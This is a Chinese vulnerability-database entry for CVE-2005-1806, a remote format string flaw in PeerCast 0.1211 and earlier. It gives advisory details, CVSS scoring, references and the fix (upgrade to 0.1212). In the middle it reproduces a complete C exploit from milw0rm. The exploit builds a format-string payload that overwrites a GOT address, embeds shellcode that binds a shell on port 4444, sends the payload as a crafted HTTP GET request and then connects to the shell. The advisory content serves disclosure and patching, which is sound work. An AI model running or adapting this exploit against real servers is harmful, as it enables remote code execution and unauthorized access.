CVE-2005-1806
CVSS7.5
发布时间 :2005-05-28 00:00:00
修订时间 :2016-10-17 23:22:35
NMCOES    

[原文]Format string vulnerability in PeerCast 0.1211 and earlier allows remote attackers to execute arbitrary code via format strings in the URL.


[CNNVD]Peercast URL格式串处理漏洞(CNNVD-200505-1220)

        Peercast是类似于shoutcast的端对端流媒体服务器。
        Peercast在处理用户请求时存在格式串处理漏洞,攻击者可能利用此漏洞在主机上执行任意指令。
        Peercast中的格式串漏洞可能允许攻击者在远程目标上以运行peercast用户的权限执行任意代码,或导致服务器崩溃。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1806
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1806
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1220
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111746603629979&w=2
(UNKNOWN)  BUGTRAQ  20050528 Format String Vulnerability In Peercast 0.1211 And Earlier
http://www.gentoo.org/security/en/glsa/glsa-200506-15.xml
(UNKNOWN)  GENTOO  GLSA-200506-15
http://www.gulftech.org/?node=research&article_id=00077-05282005
(VENDOR_ADVISORY)  MISC  http://www.gulftech.org/?node=research&article_id=00077-05282005
http://www.peercast.org/forum/viewtopic.php?p=11596
(VENDOR_ADVISORY)  CONFIRM  http://www.peercast.org/forum/viewtopic.php?p=11596
http://www.vupen.com/english/advisories/2005/0651
(UNKNOWN)  VUPEN  ADV-2005-0651

- 漏洞信息

Peercast URL格式串处理漏洞
高危 格式化字符串
2005-05-28 00:00:00 2005-10-20 00:00:00
远程  
        Peercast是类似于shoutcast的端对端流媒体服务器。
        Peercast在处理用户请求时存在格式串处理漏洞,攻击者可能利用此漏洞在主机上执行任意指令。
        Peercast中的格式串漏洞可能允许攻击者在远程目标上以运行peercast用户的权限执行任意代码,或导致服务器崩溃。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        http://www.peercast.org/forum/viewtopic.php?p=11596

- 漏洞信息 (1055)

PeerCast <= 0.1211 Remote Format String Exploit (EDBID:1055)
linux remote
2005-06-20 Verified
7144 darkeagle
N/A [点击下载]
/*
\		PeerCast <= 0.1211 remote format string exploit 
/			     [<< Public Release >>]
\
/ by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]  
\								
/	uKt researcherz [ http://unl0ck.org ]
\
/ greetz goes to: uKt researcherz.
\
/
\ - smallest code - better code!!!
/
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>


//*******************************************
#define doit( b0, b1, b2, b3, addr )  { \
             b0 = (addr >> 24) & 0xff;  \
             b1 = (addr >> 16) & 0xff;  \
             b2 = (addr >>  8) & 0xff;  \
             b3 = (addr      ) & 0xff;  \
}
//*******************************************



//****************************************************************
char shellcode[] = // binds 4444 port
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";
//****************************************************************


//****************************
#define HOST "127.0.0.1"
#define PORT 7144
#define GOTADDR 0x0809da9c
#define SHELLADDR 0x49adb23c
//****************************



//****************************************************************************************
char *
evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
{
  char * buf;
  unsigned char b0, b1, b2, b3;
  int start = 256;

  doit( b0, b1, b2, b3, retaddr );
  buf = (char *)malloc(999);
  memset( buf, 0, 999 );

 b3 -= figure;
 b2 -= figure;
 b1 -= figure;
 b0 -= figure;

 snprintf( buf, 999,
           "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
	     b3 - 16 + start - base, offset, 
             b2 - b3 + start, offset + 1, 
             b1 - b2 + start, offset + 2,
             b0 - b1 + start, offset + 3 );

  return buf;
}
//****************************************************************************************




//****************************************************************************************
int
main( int argc, char * argv[] )
{
  struct sockaddr_in addr;
  int sock;
  char * fmt;
  char endian[31337], da_shell[31337];
  unsigned long locaddr, retaddr;
  unsigned int offset, base;
  unsigned char b0, b1, b2, b3;

  system("clear");
  printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*\n");
  printf("*^*^*^                    by Darkeagle                 ^*^*^*\n");
  printf("*^*^*^      uKt researcherz [ http://unl0ck.org ]      ^*^*^*\n\n");   

  memset( endian, 0x00, 31337 );
  memset( da_shell, 0x00, 31337 );

  addr.sin_family = AF_INET;
  addr.sin_port = htons(PORT);
  addr.sin_addr.s_addr = inet_addr(HOST);

  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

  locaddr = GOTADDR;
  retaddr = SHELLADDR;
  offset  = 1265; // GET /html/en/index.htmlAAA%1265$x and you will get AAAA41414141

  doit( b0, b1, b2, b3, locaddr );

  base = 4;
  printf("[*] Buildin' evil code\n");
  strcat(endian, "GET /html/en/index.html");
  snprintf( endian+strlen(endian), sizeof(endian),
            "%c%c%c%c"
            "%c%c%c%c"
            "%c%c%c%c"
            "%c%c%c%c",
             b3, b2, b1, b0,
             b3 + 1, b2, b1, b0,
             b3 + 2, b2, b1, b0,
             b3 + 3, b2, b1, b0 );

 fmt = evil_builder( retaddr, offset, base, 0x10 );

 memset(fmt+strlen(fmt), 0x55, 32);
 strcat(fmt, shellcode);
 strcat(endian, fmt);
 strcat(endian, "\r\n\r\n\r\n");
 printf("[+] Buildin' complete!\n");
 sprintf(da_shell, "telnet %s 4444", HOST);

 // just go, y0!
 printf("[*] Connectin'\n");
 if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) { printf("[-] Connection failed!\n\n"); exit(0); }

 printf("[+] Connected!\n");
 printf("[*] Sleepin'\n");
 sleep(1);

 printf("[*] Sendin'\n");
 send(sock, endian, strlen(endian), 0);

 printf("[*] Sleepin'\n");
 sleep(1);
 	
 printf("[*] Connectin' in da shell\n\n");
 sleep(1);
 system(da_shell);
 return 0;
}
//****************************************************************************************

// milw0rm.com [2005-06-20]
		

- 漏洞信息

16906
PeerCast URL Error Message Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2005-05-28 Unknow
2005-06-21 Unknow

- 解决方案

Upgrade to version 0.1212 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Peercast.org PeerCast Remote Format String Vulnerability
Input Validation Error 13808
Yes No
2005-05-30 12:00:00 2009-07-12 02:56:00
Discovery is credited to James Bercegay of the GulfTech Security Research Team.

- 受影响的程序版本

peercast.org PeerCast 0.1211
Gentoo Linux
peercast.org PeerCast 0.1212

- 不受影响的程序版本

peercast.org PeerCast 0.1212

- 漏洞讨论

PeerCast is affected by a remote format string vulnerability.

The vulnerability arises when the server attempts to handle a malformed HTTP GET request. A successful attack may result in crashing the server or lead to arbitrary code execution. This may facilitate unauthorized access.

PeerCast 0.1211 and prior versions are affected by this issue.

- 漏洞利用

Darkeagle &lt;darkeagle@linkin-park.cc&gt; provided the 'p33r-b33r.c' proof of concept exploit.

cybertronic@gmx.net provided the 'peercast_format_string.c' proof of concept exploit.

- 解决方案

The vendor has released PeerCast 0.1212 to address this issue.

Gentoo Linux has released advisory GLSA 200506-15 to address this issue. Users of affected packages are urged to execute the following commands with superuser privileges:
emerge --sync
emerge --ask --oneshot --verbose ">=media-sound/peercast-0.1212"
Please see the referenced advisory for further information.


peercast.org PeerCast 0.1211

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站